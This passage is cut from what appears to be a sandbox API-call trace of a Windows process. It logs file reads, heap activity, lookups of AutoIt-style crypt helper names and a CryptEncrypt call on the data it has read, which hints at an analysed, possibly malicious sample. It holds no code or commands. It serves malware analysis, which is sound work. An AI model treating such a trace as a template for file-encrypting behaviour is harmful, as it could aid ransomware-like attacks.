Size=0x100000) returned 0xe5b020 [0236.680] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0236.680] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x7aa, lpOverlapped=0x0) returned 1 [0236.706] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0236.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7aa) returned 0x2e54050 [0236.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7aa) returned 0x3be0048 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54050 | out: hHeap=0x970000) returned 1 [0236.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7aa) returned 0x2e54050 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54050 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0236.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0236.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0236.708] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0236.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7aa) returned 0x2e54050 [0236.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0236.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ff8 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0236.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7aa) returned 0x2e558d8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0236.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0236.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0236.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0236.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0236.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0236.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.714] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0236.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.714] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.714] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0236.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.715] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0236.715] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.715] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0236.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0236.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.715] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.715] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0236.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0236.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.715] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0236.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0236.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0236.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.716] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0236.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51520, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0236.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.717] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0236.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f350 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0236.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0236.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0236.718] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7aa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7b0) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0236.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0236.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 